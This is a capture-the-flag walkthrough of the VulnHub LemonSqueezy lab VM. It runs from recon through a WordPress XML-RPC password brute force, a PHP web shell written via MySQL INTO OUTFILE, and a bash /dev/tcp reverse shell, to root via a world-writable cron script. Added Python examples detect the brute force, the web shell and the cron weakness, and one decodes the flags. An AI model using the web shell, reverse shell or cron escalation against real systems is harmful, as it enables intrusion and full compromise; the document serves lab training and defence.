LEMONSQUEEZY: 1 (writing a web shell through MySQL)

Preparation

Target VM download:
https://vulnhub.com/entry/lemonsqueezy-1%2C473/


Information gathering

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nmap -sP 192.168.47.1/24 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-20 14:02 CST
Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 4 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.47.1
Host is up (0.00061s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.00010s latency).
MAC Address: 00:50:56:EC:64:22 (VMware)
Nmap scan report for 192.168.47.177
Host is up (0.00012s latency).
MAC Address: 00:0C:29:E2:78:CF (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.000075s latency).
MAC Address: 00:50:56:FD:24:81 (VMware)
Nmap scan report for 192.168.47.156
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 8.43 seconds

The target's IP is:

192.168.47.177

Run a full port scan to see which ports and services are open.

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nmap -p- 192.168.47.177 -A -T4 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-20 14:03 CST
Nmap scan report for 192.168.47.177
Host is up (0.00021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:E2:78:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.47.177

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.01 seconds

Only HTTP is open, which is not much to work with.
It serves the Apache default page.
A manual check for robots.txt finds nothing.
So run a directory scan.

dirb directory scan

Scan with dirb and its small wordlist (dirb works breadth-first, then descends into each directory it finds).

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# dirb http://192.168.47.177/ /usr/share/wordlists/dirb/small.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Mar 20 14:06:54 2024
URL_BASE: http://192.168.47.177/
WORDLIST_FILES: /usr/share/wordlists/dirb/small.txt

-----------------

GENERATED WORDS: 959

---- Scanning URL: http://192.168.47.177/ ----
==> DIRECTORY: http://192.168.47.177/javascript/
==> DIRECTORY: http://192.168.47.177/manual/
==> DIRECTORY: http://192.168.47.177/phpmyadmin/
==> DIRECTORY: http://192.168.47.177/wordpress/

---- Entering directory: http://192.168.47.177/javascript/ ----

---- Entering directory: http://192.168.47.177/manual/ ----
==> DIRECTORY: http://192.168.47.177/manual/en/
==> DIRECTORY: http://192.168.47.177/manual/es/
==> DIRECTORY: http://192.168.47.177/manual/images/
==> DIRECTORY: http://192.168.47.177/manual/style/

---- Entering directory: http://192.168.47.177/phpmyadmin/ ----
==> DIRECTORY: http://192.168.47.177/phpmyadmin/doc/
==> DIRECTORY: http://192.168.47.177/phpmyadmin/js/
==> DIRECTORY: http://192.168.47.177/phpmyadmin/libraries/
==> DIRECTORY: http://192.168.47.177/phpmyadmin/setup/
==> DIRECTORY: http://192.168.47.177/phpmyadmin/sql/
==> DIRECTORY: http://192.168.47.177/phpmyadmin/templates/

---- Entering directory: http://192.168.47.177/wordpress/ ----

---- Entering directory: http://192.168.47.177/manual/en/ ----
==> DIRECTORY: http://192.168.47.177/manual/en/misc/
==> DIRECTORY: http://192.168.47.177/manual/en/ssl/

---- Entering directory: http://192.168.47.177/manual/es/ ----
==> DIRECTORY: http://192.168.47.177/manual/es/misc/
==> DIRECTORY: http://192.168.47.177/manual/es/ssl/

---- Entering directory: http://192.168.47.177/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.47.177/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.47.177/phpmyadmin/doc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.47.177/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.47.177/phpmyadmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.47.177/phpmyadmin/setup/ ----
==> DIRECTORY: http://192.168.47.177/phpmyadmin/setup/lib/

---- Entering directory: http://192.168.47.177/phpmyadmin/sql/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.47.177/phpmyadmin/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.47.177/manual/en/misc/ ----

---- Entering directory: http://192.168.47.177/manual/en/ssl/ ----

---- Entering directory: http://192.168.47.177/manual/es/misc/ ----

---- Entering directory: http://192.168.47.177/manual/es/ssl/ ----

---- Entering directory: http://192.168.47.177/phpmyadmin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Wed Mar 20 14:07:04 2024
DOWNLOADED: 11508 - FOUND: 0

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

Several directories were found:

==> DIRECTORY: http://192.168.47.177/javascript/                                                                                                       
==> DIRECTORY: http://192.168.47.177/manual/                                                                                                           
==> DIRECTORY: http://192.168.47.177/phpmyadmin/                                                                                                       
==> DIRECTORY: http://192.168.47.177/wordpress/     

/manual is the Apache default manual.

/phpmyadmin asks for a username and password.

/wordpress hosts a WordPress site.

wpscan scan

Start with WordPress, since there is a dedicated scanner for it:
http://192.168.47.177/wordpress/

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:11:45 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.47.177/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.47.177/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.47.177/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.47.177/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=========================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 20 14:11:50 2024
[+] Requests Done: 180
[+] Cached Requests: 4
[+] Data Sent: 46.925 KB
[+] Data Received: 21.056 MB
[+] Memory used: 223.922 MB
[+] Elapsed time: 00:00:05

That gives some useful information (WordPress 4.8.9, XML-RPC enabled, uploads directory listable).
Next, enumerate users.

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/ -e u

[WPScan banner and the same Interesting Finding(s) as in the first run omitted]

[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:20:28 2024

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] lemon
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 20 14:20:28 2024
[+] Requests Done: 14
[+] Cached Requests: 41
[+] Data Sent: 3.992 KB
[+] Data Received: 11.639 KB
[+] Memory used: 161.723 MB
[+] Elapsed time: 00:00:00

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

There are two users:

orange
lemon

Try brute-forcing the users' passwords.

One user's password falls quickly:

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/ -e u -P /usr/share/wordlists/rockyou.txt

[WPScan banner and the same Interesting Finding(s) as in the first run omitted]

[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:25:39 2024

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] lemon
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - orange / ginger
^C
Trying lemon / money Time: 00:00:06 <                                                                           > (875 / 28688947)  0.00%  ETA: 56:22:35

[!] Valid Combinations Found:
 | Username: orange, Password: ginger

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 20 14:25:48 2024
[+] Requests Done: 900
[+] Cached Requests: 42
[+] Data Sent: 483.302 KB
[+] Data Received: 545.76 KB
[+] Memory used: 153.785 MB
[+] Elapsed time: 00:00:09

Scan Aborted: Canceled by User

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 
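Seen from the server, the password attack above is loud: WPScan pushed 900 requests at xmlrpc.php in nine seconds from a single source. The script below is an added example, not part of the original post and not a WPScan feature, that parses Apache combined-format access log lines and reports any client that POSTs to xmlrpc.php more than a threshold number of times inside a sliding window. The log lines, client addresses, timestamps and thresholds in it are constructed sample data.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" format: ip ident user [time] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop any query string
        "status": int(m.group("status")),
    }


def detect_xmlrpc_bruteforce(lines, threshold=20, window_seconds=60):
    """Return {ip: peak_count} for clients that POST to xmlrpc.php more than
    `threshold` times inside any `window_seconds` sliding window.
    Each client's lines are expected in chronological order, as in a log file."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent xmlrpc POSTs
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or not rec["path"].endswith("/xmlrpc.php"):
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()                      # slide the window forward
        if len(q) > threshold:
            alerts[rec["ip"]] = max(alerts.get(rec["ip"], 0), len(q))
    return alerts


def build_sample_log():
    """Constructed sample (not a real capture): 30 XML-RPC POSTs in nine seconds
    from one host, mixed with ordinary traffic and a single POST from another."""
    lines = []
    for i in range(30):
        sec = 39 + (i * 9) // 30
        lines.append(f'192.168.47.156 - - [20/Mar/2024:14:25:{sec:02d} +0800] '
                     f'"POST /wordpress/xmlrpc.php HTTP/1.1" 200 403 "-" "-"')
    for i in range(3):
        lines.append(f'192.168.47.20 - - [20/Mar/2024:14:25:{40 + i:02d} +0800] '
                     f'"GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"')
    lines.append('192.168.47.20 - - [20/Mar/2024:14:26:01 +0800] '
                 '"POST /wordpress/xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, peak in detect_xmlrpc_bruteforce(build_sample_log()).items():
        print(f"[!] {ip}: {peak} POSTs to xmlrpc.php within 60s")
```

The matching fix on the server is the one WPScan's own finding points at: disable or restrict access to xmlrpc.php if nothing needs it, and rate-limit POSTs to it and to wp-login.php at the web server or WAF, so a wordlist run cannot test 900 credentials in nine seconds.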

Try logging into both systems, WordPress and phpMyAdmin, with
orange / ginger

The WordPress login succeeds, but very few features are available, so this is probably not an administrator account.

The same credentials do not work on phpMyAdmin.

During information gathering a string that looks very much like a password turned up:
n0t1n@w0rdl1st!

Try it against phpMyAdmin.

Login successful!

From here lemon's password hash can simply be overwritten with orange's, since orange's password is already known.
That gives a working login as lemon.

Writing a shell through phpMyAdmin

The original plan was to work through the WordPress back end, but if the phpMyAdmin account has file-write privileges, a shell can be written directly from SQL.

Writing straight into Apache's default document root fails: permission denied.

What about the wordpress directory?

select '<?php phpinfo();system($_GET[1]);?>' into outfile '/var/www/html/wordpress/1.php'


That works: the file is written and we have a shell.
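The file dropped by INTO OUTFILE above is an ordinary .php file in the document root, which makes it a natural target for file-based detection. Below is an added Python example, not from the original post and not a tool the post uses, that walks a document root and flags PHP files that pass a request parameter straight into a command- or code-execution function, or call phpinfo(). The sample tree it stages in a temporary directory is constructed to mirror the 1.php of this walkthrough.

```python
import os
import re
import tempfile

# Functions that execute commands or code, and request superglobals an
# attacker controls; together they are the shape of a one-line web shell.
SINKS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE)"
SINK_FED_BY_REQUEST = re.compile(SINKS + r"\s*\(\s*" + SOURCES + r"\b")
PHPINFO_CALL = re.compile(r"\bphpinfo\s*\(")


def scan_php_source(src):
    """Return the reasons a PHP source string looks like a web shell (empty if none)."""
    reasons = []
    if SINK_FED_BY_REQUEST.search(src):
        reasons.append("execution sink fed directly from a request parameter")
    if PHPINFO_CALL.search(src):
        reasons.append("phpinfo() discloses server configuration")
    return reasons


def scan_webroot(root):
    """Walk a document root; return {relative_path: [reasons]} for suspicious PHP files."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", errors="replace") as f:
                reasons = scan_php_source(f.read())
            if reasons:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = reasons
    return findings


def build_sample_webroot():
    """Constructed sample tree (not a real server): a normal WordPress entry
    point, a non-PHP file, and a shell like the 1.php from this walkthrough."""
    root = tempfile.mkdtemp(prefix="webroot-")
    wp = os.path.join(root, "wordpress")
    os.makedirs(wp)
    files = {
        "index.php": "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n",
        "readme.html": "<html>not php</html>\n",
        "1.php": "<?php phpinfo();system($_GET[1]);?>\n",
    }
    for name, body in files.items():
        with open(os.path.join(wp, name), "w") as f:
            f.write(body)
    return root


if __name__ == "__main__":
    for path, reasons in scan_webroot(build_sample_webroot()).items():
        print(f"[!] {path}: {'; '.join(reasons)}")
```

On the MySQL side, two settings decide whether the write succeeds at all: the account phpMyAdmin logs in with needs the FILE privilege, and secure_file_priv must be empty (unrestricted) or point at a directory the web server serves. Pointing secure_file_priv at a directory outside the document root, or disabling file operations with NULL, and withholding FILE from application accounts closes this path; the document root should also not be writable by the mysql user.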

Reverse shell

Next, a reverse shell:

bash -c "bash -i >& /dev/tcp/192.168.47.156/9999 0>&1"

URL-encode the command so the & characters are not interpreted as query-string separators.

The reverse shell connects back.

Upgrade the shell:

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nc -lvvp 9999                                 
listening on [any] 9999 ...
192.168.47.177: inverse host lookup failed: Unknown host
connect to [192.168.47.156] from (UNKNOWN) [192.168.47.177] 45450
bash: cannot set terminal process group (557): Inappropriate ioctl for device
bash: no job control in this shell
www-data@lemonsqueezy:/var/www/html/wordpress$ tty
tty
not a tty
www-data@lemonsqueezy:/var/www/html/wordpress$ which python
which python
/usr/bin/python
www-data@lemonsqueezy:/var/www/html/wordpress$ python -c "import pty;pty.spawn('/bin/bash')"
<ress$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@lemonsqueezy:/var/www/html/wordpress$ tty
tty
/dev/pts/0
www-data@lemonsqueezy:/var/www/html/wordpress$ export TERM=xterm
export TERM=xterm
www-data@lemonsqueezy:/var/www/html/wordpress$ clear

That upgrades to a proper tty and sets TERM so clear works.

Check whether any SUID binary offers privilege escalation:

www-data@lemonsqueezy:/var/www/html/wordpress$ find / -perm -4000 -type f 2>/dev/null
/null/ -perm -4000 -type f 2>/dev/
/usr/sbin/pppd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/ping
/bin/mount
/bin/fusermount

The user flag is in /var/www:

cd www
www-data@lemonsqueezy:/var/www$ ls
ls
html  user.txt
www-data@lemonsqueezy:/var/www$ cat user.txt
cat user.txt
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
www-data@lemonsqueezy:/var/www$ echo 'TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH' | base64 -d
base64 -dzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH' | b
Music can change your life, base64: invalid input
www-data@lemonsqueezy:/var/www$ 
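The "base64: invalid input" above is a padding problem, not a broken flag: user.txt is 38 characters long, which is not a multiple of four, so GNU base64 decodes the complete groups and then rejects the remainder. This added Python example (not part of the original post) pads such input before decoding and, using the two strings printed in this walkthrough, also shows that user.txt and root.txt are the two halves of one base64 message.

```python
import base64


def decode_lenient(text):
    """Decode base64 that may be missing its trailing '=' padding.
    GNU `base64 -d` stops with "invalid input" on such data; restoring the
    padding recovers every byte that is fully present. A length of 4n+1
    can never be valid base64, so that case is rejected."""
    text = "".join(text.split())           # tolerate whitespace/newlines
    missing = (-len(text)) % 4
    if missing == 3:
        raise ValueError("length 4n+1 is not valid base64")
    return base64.b64decode(text + "=" * missing)


# The two flag strings exactly as shown in this walkthrough.
USER_FLAG = "TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH"   # /var/www/user.txt, 38 chars
ROOT_FLAG = "NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4="   # /root/root.txt, 38 chars


def decode_flags():
    """Return (what user.txt alone yields, what both halves yield together)."""
    partial = decode_lenient(USER_FLAG).decode("ascii")
    full = base64.b64decode(USER_FLAG + ROOT_FLAG).decode("ascii")
    return partial, full


if __name__ == "__main__":
    partial, full = decode_flags()
    print(repr(partial))
    print(full)
```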

Privilege escalation through a cron job

Look at the scheduled jobs:

www-data@lemonsqueezy:/var/www$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    /etc/logrotate.d/logrotate
#

There is one entry beyond the defaults, run as root every two minutes:
/etc/logrotate.d/logrotate

Check the permissions on that file. If it is 777, any user can edit it, and because cron runs it as root, whatever is put in it runs as root.

It really is 777, so editing it is a direct route to root.
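The check done by hand above (a root cron job whose script is mode 777) is easy to automate as a routine audit. The Python script below is an added example, not part of the original post, that parses /etc/crontab-format text and, for every job that runs as root, checks whether the files its command refers to are writable by group or others, or sit in a writable directory without the sticky bit. It runs against a constructed crontab and a constructed directory tree staged in a temporary folder that mirrors this box: a world-writable /etc/logrotate.d/logrotate next to a correctly permissioned script.

```python
import os
import re
import stat
import tempfile

# Absolute paths inside a crontab command, e.g. /usr/sbin/anacron, /etc/logrotate.d/logrotate
ABS_PATH = re.compile(r"(?<![\w.-])(/[\w./-]+)")


def parse_system_crontab(text):
    """Yield (user, command) for each job line in /etc/crontab format
    (minute hour dom month dow user command). Comments, blank lines and
    VAR=value lines such as SHELL=/bin/sh are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        yield fields[5], fields[6]


def writable_by_others(path):
    """True if the group or world write bit is set on path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text, root="/"):
    """Return (path, reason, command) for every root job whose command refers
    to a file a non-root user could modify. `root` lets the audit run against
    a staged tree instead of the live filesystem."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for p in ABS_PATH.findall(command):
            real = os.path.join(root, p.lstrip("/"))
            if not os.path.isfile(real):
                continue   # run-parts directories and absent binaries are out of scope here
            if writable_by_others(real):
                findings.append((p, "file is group/world-writable", command))
                continue
            parent = os.path.dirname(real)
            sticky = os.stat(parent).st_mode & stat.S_ISVTX
            if writable_by_others(parent) and not sticky:
                findings.append((p, "parent directory is writable, file can be replaced", command))
    return findings


# Constructed crontab text mirroring the entries seen on the box, plus two extra jobs.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/2 *   * * *   root    /etc/logrotate.d/logrotate
*/5 *   * * *   root    /usr/local/bin/backup.sh
0 3     * * *   backup  /home/backup/sync.sh
"""


def build_sample_root():
    """Stage a constructed filesystem tree in a temp dir: one world-writable
    root-run script (the bug on this box) and one correctly permissioned script."""
    root = tempfile.mkdtemp(prefix="cron-audit-")

    def put(rel, mode, body="#!/bin/sh\n"):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        os.chmod(os.path.dirname(full), 0o755)   # fixed regardless of umask
        with open(full, "w") as f:
            f.write(body)
        os.chmod(full, mode)

    put("etc/logrotate.d/logrotate", 0o777, "#!/usr/bin/env python\nimport os\n")
    put("usr/local/bin/backup.sh", 0o755)
    put("home/backup/sync.sh", 0o777)   # writable, but not run as root, so not reported
    os.makedirs(os.path.join(root, "etc/cron.hourly"), exist_ok=True)
    return root


if __name__ == "__main__":
    for path, reason, cmd in audit_crontab(SAMPLE_CRONTAB, build_sample_root()):
        print(f"[!] {path}: {reason}  (job: {cmd})")
```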

Back the file up first:

www-data@lemonsqueezy:/etc/logrotate.d$ cp logrotate /var/www/html/wordpress/logrotate.bak
rotate.bakte /var/www/html/wordpress/logr
www-data@lemonsqueezy:/etc/logrotate.d$ echo 'chmod +s /bin/bash' >> logrotate
echo 'chmod +s /bin/bash' >> logrotate
www-data@lemonsqueezy:/etc/logrotate.d$ cat logrotate
cat logrotate
#!/usr/bin/env python
import os
import sys
try:os.system('rm -r /tmp/* ')
except:sys.exit()
chmod +s /bin/bash
www-data@lemonsqueezy:/etc/logrotate.d$ ls -la /bin/bash
ls -la /bin/bash
-rwxr-xr-x 1 root root 1099016 May 16  2017 /bin/bash

Appending the line does not work, because the rest of the file gets in the way (the script has a Python shebang, and a bare shell command inside a Python script is a syntax error), so overwrite the file instead.

www-data@lemonsqueezy:/etc/logrotate.d$ echo 'chmod +s /bin/bash ' > logrotate
echo 'chmod +s /bin/bash ' > logrotate
www-data@lemonsqueezy:/etc/logrotate.d$ cat logrotate
cat logrotate
chmod +s /bin/bash 
www-data@lemonsqueezy:/etc/logrotate.d$ ls -al /bin/bash
ls -al /bin/bash
-rwxr-xr-x 1 root root 1099016 May 16  2017 /bin/bash

After the cron job runs again, the permissions on /bin/bash change and the setuid bit is set.

Now escalate directly:

www-data@lemonsqueezy:/etc/logrotate.d$ bash -p
bash -p
bash-4.4# whoami
whoami
root
bash-4.4# pwd
pwd
/etc/logrotate.d
bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
root.txt
bash-4.4# cat root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
bash-4.4# 

That completes the walkthrough of this box.
